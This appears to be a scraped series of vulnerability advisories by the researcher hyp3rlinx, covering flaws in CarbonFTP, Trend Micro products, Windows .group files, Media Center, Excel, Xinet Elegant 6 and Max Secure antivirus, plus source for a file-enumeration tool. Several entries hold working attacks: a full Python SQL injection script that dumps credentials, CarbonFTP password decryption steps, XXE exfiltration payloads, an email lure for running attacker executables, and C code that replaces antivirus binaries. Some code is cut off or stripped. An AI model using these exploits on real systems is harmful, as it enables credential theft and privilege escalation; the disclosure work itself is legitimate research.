Neowise CarbonFTP v1.4 Insecure Proprietary Password Encryption CVE-2020-6857
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.neowise.com [Product] CarbonFTP v1.4 CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa. It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and option to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be quickly re-used later. Download: https://www.neowise.com/freeware/ Hash: 7afb242f13a9c119a17fe66c6f00a1c8 [Vulnerability Type] Insecure Proprietary Password Encryption [CVE Reference] CVE-2020-6857 [Affected Component] Password Encryption [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Security Issue] CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key. The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex are coverted to decimal which is then computed by adding the key "97F" to the result. The key 97F seems to be the same for all executables across all systems. Finally, passwords are stored as decimal values. If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files. They can be found under "C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects". e.g. Password=STRING|"2086721956209392195620939" Observing some very short password examples we see interesting patterns: 27264 27360 27360 27360 27360= a 27520 27617 27617 27617 27617= b 27266 27616 27360 27361 27616= aab 27521 27616 27616 27616 27616= ba Password encryption/decryption is as follows. Encryption process example. 484C as decimal is the value 18508 97F hex to decimal is the value 2431 (encrypt key) 18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL". To decrypt we just perform the reverse of the operation above. 20939 - 2431 = 18508 Next, convert the decimal value 18508 to hex and we get 484C. Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL". CarbonFTP passwords less than nine characters are padded using chars from the current password up until reaching a password length of nine bytes. The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length of nine bytes "XYXYXYXYX". Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes. Therefore, we will get several cracked password candidates like: "HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH" However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one shot without having several candidates to choose from with one of them being the correct password. Therefore, "LONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947" and because it is greater than nine bytes it is cracked without any candidate passwords returned. >From offset 0047DA6F to 0047DAA0 is the loop that performs the password >decryption process. Using the same password "HELL" as example. BPX @47DA6F 0047DA6F | 8D 45 F0 | lea eax,dword ptr ss:[ebp-10] | 0047DA72 | 50 | push eax | 0047DA73 | B9 05 00 00 00 | mov ecx,5 | 0047DA78 | 8B D3| mov edx,ebx | 0047DA7A | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678 | 0047DA82 | 83 C3 05 | add ebx,5 | 0047DA85 | 8B 45 F0 | mov eax,dword ptr ss:[ebp-10] | [ebp-10]:"20867" 0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C | 0047DA8D | 2B 45 F8 | sub eax,dword ptr ss:[ebp-8] | ;<=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431 0047DA90 | 66 89 06 | mov word ptr ds:[esi],ax | 0047DA93 | 83 C6 02 | add esi,2 | 0047DA96 | 8B 45 FC | mov eax,dword ptr ss:[ebp-4]
Trend Micro Security 2019 (Consumer) Multiple Products Security Bypass Protected Service Tampering CVE-2019-19697
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt [+] ISR: ApparitionSec [Vendor] www.trendmicro.com [Product] Trend Micro Security 2019 (Consumer) Multiple Products Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft. [Vulnerability Type] Security Bypass Protected Service Tampering [CVE Reference] CVE-2019-19697 [Security Issue] Trend Micro Maximum Security is vulnerable to arbitrary code execution as it allows for creation of registry key to target a process running as SYSTEM. This can allow a malware to gain elevated privileges to take over and shutdown services that require SYSTEM privileges like Trend Micros "Asmp" service "coreServiceShell.exe" which does not allow Administrators to tamper with them. This could allow an attacker or malware to gain elevated privileges and tamper with protected services by disabling or otherwise preventing them to start. Note administrator privileges are required to exploit this vulnerability. [CVSS 3.0 Scores: 3.9] [Affected versions] Platform Microsoft Windows Premium Security 2019 (v15) Maximum Security 2019 (v15) Internet Security 2019 (v15) Antivirus + Security 2019 (v15) [References] https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx [Exploit/POC] 1) Create a entry for the following registry key targeting "PtWatchdog.exe" and set the debugger string value to an arbitrary executable to gain SYSTEM privs. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe 2) Create a string named "debugger" under the reg key and give it the value of the executable you wish to run as SYSTEM. 3) Restart the machine or wait until service is restart then you get SYSTEM and can now disable Trend Micro endpoint security coreServiceShell.exe service [Network Access] Local [Severity] Low [Disclosure Timeline] Vendor Notification: October 8, 2019 Vendor confirms issue: October 28, 2019 Vendor release date: January 14, 2020 January 16, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Trend Micro Security (Consumer) Multiple Products Persistent Arbitrary Code Execution CVE-2019-20357
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-PERSISTENT-ARBITRARY-CODE-EXECUTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.trendmicro.com [Product(s)] Trend Micro Security (Consumer) Multiple Products Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft. [Vulnerability Type] Persistent Arbitrary Code Execution [CVE Reference] CVE-2019-20357 [CVSSv3 Scores: 6.7] [Security Issue] Trend Micro Security can potentially allow an attackers to use a malicious program to escalate privileges to SYSTEM integrity and attain persistence on a vulnerable system. [Product Affected Versions] Platform Microsoft Windows Premium Security 2019 (v15) and 2020 (v16) Maximum Security 2019 (v15) and 2020 (v16) Internet Security 2019 (v15) and 2020 (v16) Antivirus + Security 2019 (v15) and 2020 (v16) [References] https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124099.aspx [Exploit/POC] Compile C test code "Program.c" void main(void){ puts("Done!"); system("pause"); } 1) Place under c:\ dir. 2) Reboot the machine, the coreServiceShell.exe service loads and executes our binary with SYSTEM integrity. [Network Access] Local [Severity] Medium [Disclosure Timeline] Vendor Notification: October 8, 2019 vendor advisory: January 15, 2020 January 16, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Microsoft Windows .Group File / URL Field Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt [+] twitter.com/hyp3rlinx [+] apparitionsec@gmail [+] ISR: Apparition Security [Vendor] www.microsoft.com [Product] Windows ".Group" File Type Gorup files are a collection of contacts created by Windows Contacts, an embedded contact management program included with Windows. It contains a list of contacts saved into a group; which can be used to create a mailing list for sending email messages to multiple addresses at once. [Vulnerability Type] URL Field Code Execution [CVE Reference] N/A [Security Issue] Windows ".group" files are related to Contact files and suffer from unexpected code execution when clicking the "Contact Group Details" tab Website Go button. This happens if the website URL field points to an executable file. This is the same type of vulnerability affecting Windows .contact files that remains unfixed as of the time of this writing and has a metasploit module available. [References] http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt Therefore, attacker supplied executables can run unexpected to the user, who thinks they visit a website when click the Website go button. Moreover, if files are compressed using certain archive utilities it may be possible to skirt security warnings even when the executable is internet downloaded or copied from network share. This exploit requires a bit more user interaction than the previously disclosed .contact file vulnerability, as the GROUP file will complain if not in the Contacts directory. Advisory released for the sake of completeness and user security awareness. [Exploit/POC] 1) create a Windows .group file 2) create a directory named "http" 3) create an executable file with a .com ext (change .exe to .com) like www.microsoft.com an place it in the "http" dir alongside .group file. 4) point the website URL to the executable using path traversal like "http.\www.microsoft.com" which is the website address in the .group file. Note: the directory traversal can also point to other dirs like ..\Downloads\http.\microsoft.com but downside is the URL looks very sketchy. 5) package it up in an archive .rar etc. 6) send the .group file via email, or download it and lure the user to place the archive in the "c:\User\\Contacts" directory. 7) open the archive and double click the .group file (Windows will complain with an error to move to the contacts folder if not within that dir already) next click the website address go button. The attackers executable will run instead of navigating to a website as would be expected by an end user. [Severity] High [Disclosure Timeline] Vendor Notification: Same type vuln affecting .contact files disclosed January 16, 2019, status remains unfixed. January 1, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Microsoft Windows Media Center XXE MotW Bypass (Anniversary Edition)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt [+] ISR: Apparition Security [Vendor] www.microsoft.com [Product] Microsoft Windows Media Center Windows Media Center is a discontinued digital video recorder and media player created by Microsoft. Media Center was first introduced to Windows in 2002 on Windows XP Media Center. [Vulnerability Type] XML External Entity MotW Bypass (Anniversary Edition) [CVE Reference] N/A [Security Issue] This vulnerability was originally released by me back on December 4, 2016, yet remains unfixed. Now, to make matters worse I will let you know "mark-of-the-web" MotW does not matter here, its just ignored. Meaning, if the .MCL file is internet downloaded it gets the MOTW but files still exfiltrated. Therefore, I am releasing this "anniversary edition" XXE with important motw informations. This is a fully working remote information disclosure vulnerability that still affects Windows 7. Windows 7 is near end of life this January, yet it is still used by many organizations. Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center but I have not tested it. Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server Port 80 etc... Download the ".mcl" file using Microsoft Internet Explorer. Check the MotW where you downloaded the .mcl file dir /r and note the Zone.Identifier:$DATA exists. Open the file and BOOM! watch shitz leaving!... still vulnerable after all these years lol. OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro [Exploit/POC] 1) "M$-Wmc-Anniversary-Motw-Bypass.mcl" # PoC /FindMeThatBiotch.dtd"> %junk; %param666; %FindMeThatBiotch; ]> 2) "FindMeThatBiotch.dtd" /%data666;'>"> 3) Auto exploit PHP .mcl file downloader. /M$-Wmc-Anniversary-Motw-Bypass.mcl'; header('Content-Type: application/octet-stream'); header("Content-Transfer-Encoding: Binary"); header("Content-disposition: attachment; filename=\"" . basename($url) . "\""); readfile($url); ?> 4) python -m SimpleHTTPServer 80 [POC Video URL] https://www.youtube.com/watch?v=zcrATpBNAZ0 [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: December 4, 2016 MSRC "wont fix" Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 Pre-Auth SQL Injection 0Day CVE-2019-19245
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.napc.com [Product] Xinet Elegant 6 Asset Library Web Interface v6.1.655 Web based interface for xinet asset management solution. [Vulnerability Type] Pre-Auth SQL Injection [CVE Reference] CVE-2019-19245 [Security Issue] NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows Pre-Authentication Error based SQL Injection via the /elegant6/login LoginForm[username] field when double quotes are used. The vulnerable version seems to be old, but it may still be possible to still find it deployed as I have. Vulnerable Parameter: LoginForm[username] (POST) Method. [Exploit/POC] import requests,time,re,sys,argparse #NAPC Xinet Elegant 6 Asset Library v6.1.655 #Pre-Auth SQL Injection 0day Exploit #By hyp3rlinx #ApparitionSec #== #This will dump tables, usernames and passwords in vulnerable versions #REQUIRE PARAMS: LoginForm[password]=[rememberMe]=0[username]=SQL #SQL INJECTION VULN PARAM --> LoginForm[username] # IP="" PORT="80" URL="" NUM_INJECTS=20 k=1 j=0 TABLES=False CREDS=False SHOW_SQL_ERROR=False def vuln_ver_chk(): global IP, PORT TARGET = "http://"+IP+":"+PORT+"/elegant6/login; response = requests.get(TARGET) if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content): print "[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655." return True print "[!] Version not vulnerable :(" return False def sql_inject_request(SQL): global IP, PORT URL = "http://"+IP+":"+PORT+"/elegant6/login; tmp="" headers = {'User-Agent': 'Mozilla/5.0'} payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL} session = requests.Session() res = session.post(URL,headers=headers,data=payload) idx = res.content.find('CDbCommand') # Start of SQL Injection Error in response idx2 = res.content.find('key 1') # End of SQL Injection Error in response return res.content[idx : idx2+3] #Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc def inc(): global k,j while j < NUM_INJECTS: j+=1 if k !=1: k+=1 return str(j)+','+str(k) def tidy_up(results): global CREDS idx = results.find("'") if idx != -1: idx2 = results.rfind("'") if not CREDS: return results[idx + 1: idx2 -2] else: return results[idx + 2: idx2] def breach(i): global k,j,NUM_INJECTS,SHOW_SQL_ERROR result="" #Dump Usernames & Passwords if CREDS: if i % 2 == 0: target='username' else: target='password' SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))' 'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -') if not SHOW_SQL_ERROR: result = tidy_up(sql_inject_request(SQL)) else: result = sql_inject_request(SQL)+"\n" print "[+] Dumping "+target+": "+result #Dump Tables if TABLES: while j < NUM_INJECTS: nums = inc() SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()' 'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -') if not SHOW_SQL_ERROR: result = tidy_up(sql_inject_request(SQL)) else: result = sql_inject_request(SQL) + "\n" print "[+] Dumping Table... " +result time.sleep(0.3) def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-i", "--ip_address", help=".") parser.add_argument("-p", "--port", help="Port, Default is 80") parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.") parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.") parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.") parser.add_argument("-s", "--show_sql_errors", nargs="?", const=&quo
Max Secure Anti Virus Plus v19.0.4.020 Insecure Permissions CVE-2019-19382
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt [+] ISR: ApparitionSec [Vendor] www.maxpcsecure.com [Affected Product Code Base] Max Secure Anti Virus Plus - 19.0.4.020 File hash: ab1dda23ad3955eb18fdb75f3cbc308a msplusx64.exe [Vulnerability Type] Insecure Permissions [CVE Reference] CVE-2019-19382 [Security Issue] Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory. Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation. C:\Program Files\Max Secure Anti Virus Plus>cacls * | more C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F [Affected Component] Permissions on installation directory [Exploit/POC] #include #include #define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe" #define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe" #define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp" /* Max Secure Anti Virus Plus PoC By hyp3rlinx */ BOOL PWNED=FALSE; BOOL FileExists(LPCTSTR szPath){ DWORD dwAttrib = GetFileAttributes(szPath); return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); } void main(void){ if(!FileExists(DISABLED_TARGET)){ CopyFile(TARGET, TMP, FALSE); Sleep(1000); CopyFile(TMP, DISABLED_TARGET, FALSE); printf("[+] Max Secure Anti Virus Plus EoP PoC\n"); Sleep(1000); printf("[+] Disabled MaxSDUI.exe ...\n"); Sleep(300); }else{ PWNED=TRUE; } if(!PWNED){ char fname[MAX_PATH]; char newLoc[]=TARGET; DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); if (size){ printf("[+] Copying exploit to vuln dir...\n"); Sleep(1000); CopyFile(fname, TARGET, FALSE); printf("[+] Replaced legit Max Secure EXE...\n"); Sleep(2000); printf("[+] Done!\n"); MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk"); Sleep(1000); exit(0); } }else{ if(FileExists(TMP)){ remove(TMP); } printf("[+] Max Secure Anti Virus Plus PWNED!!!\n"); printf("[+] hyp3rlinx\n"); system("pause"); } } [POC Video URL] https://www.youtube.com/watch?v=DXSV5geXkTw [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: November 19, 2019 Vendor: "received a reply they will fix soon" Status request: November 24, 2019 No replies other than automated response. November 29, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Microsoft Excel 2016 v1901 Import Error XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Excel 2016 v1901 Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. [CVE] N/A [Vulnerability Type] Error Import Based XML External Entity Injection [Security Issue] Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as Html page" functionality upon receiving errors importing a specially crafted XML file. This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability. Tested successfuly Windows 10 .NET framework version v4.0.30319. C:\>dir /b %windir%\Microsoft.NET\Framework\v* v4.0.30319 [Exploit/POC] Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML' 1) You will get error like: "Error: Unable to connect We encountered an error while trying to connect. The user will then get an option to 'Edit' where they can import the file as an HTML file Result Local data can be exfiltrated to remote server" 2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel User has choose to import as HTML then XXE attack will succeed: e.g. 127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO /1.1" 200 - Malicious XML file to load as New Data Query "test.xml" http://127.0.0.1:8000/payload.dtd'> %dtd;]> [Network Access] Local [Severity] Medium [Disclosure Timeline] Vendor Notification: May 10, 2019 MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release. Engineering Team may or may not fix in a future version of the release." November 30, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Trend Micro Anti-Threat Toolkit <= v1.62.0.1218 / Remote Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt [+] ISR: Apparition Security [Vendor] www.trendmicro.com [Product] Trend Micro Anti-Threat Toolkit (ATTK) 1.62.0.1218 and below Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections. It can be used to perform system forensic scans and clean the following infection types: General malware infection Master boot record Infection CIDOX/ RODNIX infection Rootkit infection Zbot infection Cryptolocker infection etc.. [Vulnerability Type] Remote Code Execution [CVE Reference] CVE-2019-9491 [Security Issue] Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be placed in the vacinity of the ATTK when a scan is launched by the end user. Since the ATTK is signed by verified publisher and therefore assumed trusted any MOTW security warnings are bypassed if the malware was internet downloaded, also it can become a persistence mechanism as each time the Anti-Threat Toolkit is run so can an attackers malware. Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.) attk_collector_cli_x64.exe Hash: e8503e9897fd56eac0ce3c3f6db24fb1 TrendMicroRansomwareCollector64.r09.exe Hash: 798039027bb4363dcfd264c14267375f attk_ScanCleanOnline_gui_x64.exe Hash: f1d2ca4b14368911c767873cdbc194ed [References] https://success.trendmicro.com/solution/000149878 *All versions of the ATTK have been updated with the newer version. Anti-Threat Toolkit (ATTK) 1.62.0.1223 [Exploit/POC] Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe". Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed. #include void main(void){ puts("Trend Micro Anti-Threat Toolkit PWNED!"); puts("Discovery: hyp3rlinx"); puts("CVE-2019-9491\n"); WinExec("powershell", 0); } [POC Video URL] https://www.youtube.com/watch?v=HBrRVe8WCHs [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: September 9, 2019 Vendor confirms vulnerability: September 25, 2019 Vendor requests to coordinate advisory: September 25, 2019 October 19, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
NtFileSins v2.1 Windows NTFS Privileged File Access Enumeration Tool
from subprocess import Popen, PIPE import sys,argparse,re # NtFileSins v2.1 # Fixed: save() logic to log report in case no Zone.Identifiers found. # Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet. # # Windows File Enumeration Intel Gathering. # Standard users can prove existence of privileged user artifacts. # # Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message, # when a file exists or doesn't exist, when restricted access is attempted by another user. # # However, accessing files directly by attempting to "open" them from cmd.exe shell, # we can determine existence by compare inconsistent Windows error messages. # # Requirements: 1) target users with >= privileges (not admin to admin). # 2) artifacts must contain a dot "." or returns false positives. # # Windows message "Access Denied" = Exists # Windows message "The system cannot find the file" = Not exists # Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command, # operable program or batch file" = Admin to Admin so this script is not required. # # Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose. # For evil or maybe check for basic malware IOC existence on disk with user-only rights. # #==# # NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1 # # By John Page (aka hyp3rlinx) # # Apparition Security # #==# BANNER=''' _ ___ ___ _ / | / /_ __/ (_) /__ / ___/(_)___ _ / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/ / /| / / / / __/ / / / __/__/ / / / / (__ ) /_/ |_/ /_/ /_/ /_/_/\___//_/_/ /_// v2.1 By hyp3rlinx ApparitionSec ''' sin_cnt=0 internet_sin_cnt=0 found_set=set() zone_set=set() ARTIFACTS_SET=set() ROOTDIR = "c:/Users/" ZONE_IDENTIFIER=":Zone.Identifier:$DATA" USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures", "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"] APPDATA_DIR=["AppData/Local/Temp"] EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat", ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"]) REPORT="NtFileSins_Log.txt" def usage(): print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n" print '-u victim -d Searches -a "MS17-020 - Google Search.url"' print '-u victim -a ""' print "-u victim -d Downloads -a -s" print '-u victim -d Contacts -a "Mike N.contact"' print "-u victim -a APT.txt -b -n" print "-u victim -d -z Desktop/MyFiles -a <.name>" print "-u victim -d Searches -a .search-ms" print "-u victim -d . -a " print "-u victim -d desktop -a inverted-crosses.mp3 -b" print "-u victim -d Downloads -a APT.exe -b" print "-u victim -f list_of_files.txt" print "-u victim -f list_of_files.txt -b -s" print "-u victim -f list_of_files.txt -x .txt" print "-u victim -d desktop -f list_of_files.txt -b" print "-u victim -d desktop -f list_of_files.txt -x .rar" print "-u victim -z -s -f list_of_files.txt" def parse_args(): parser.add_argument("-u", "--user", help="Privileged user target") parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .") parser.add_argument("-a", "--artifact", help="Single artifact we want to verify e
NtFileSins / Windows NTFS Privileged File Access Enumeration Tool
from subprocess import Popen, PIPE import sys,argparse,re # NtFileSins v2 # Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet. # # Windows File Enumeration Intel Gathering. # Standard users can prove existence of privileged user artifacts. # # Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message, # when a file exists or doesn't exist, when restricted access is attempted by another user. # # However, accessing files directly by attempting to "open" them from cmd.exe shell, # we can determine existence by compare inconsistent Windows error messages. # # Requirements: 1) target users with >= privileges. # 2) artifacts must contain a dot "." or returns false positives. # # Windows message "Access Denied" = Exists # Windows message "The system cannot find the file" = Not exists # Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command, # operable program or batch file" = Admin to Admin so this script is not required. # # Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose. # For evil or maybe check for basic malware IOC existence on disk with user-only rights. # #=# # NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2. # # By John Page (aka hyp3rlinx)# # Apparition Security # #=# BANNER=''' _ ___ ___ _ / | / /_ __/ (_) /__ / ___/(_)___ _ / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/ / /| / / / / __/ / / / __/__/ / / / / (__ ) /_/ |_/ /_/ /_/ /_/_/\___//_/_/ /_// v2 By hyp3rlinx ApparitionSec ''' sin_cnt=0 internet_sin_cnt=0 found_set=set() zone_set=set() ARTIFACTS_SET=set() ROOTDIR = "c:/Users/" ZONE_IDENTIFIER=":Zone.Identifier:$DATA" USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures", 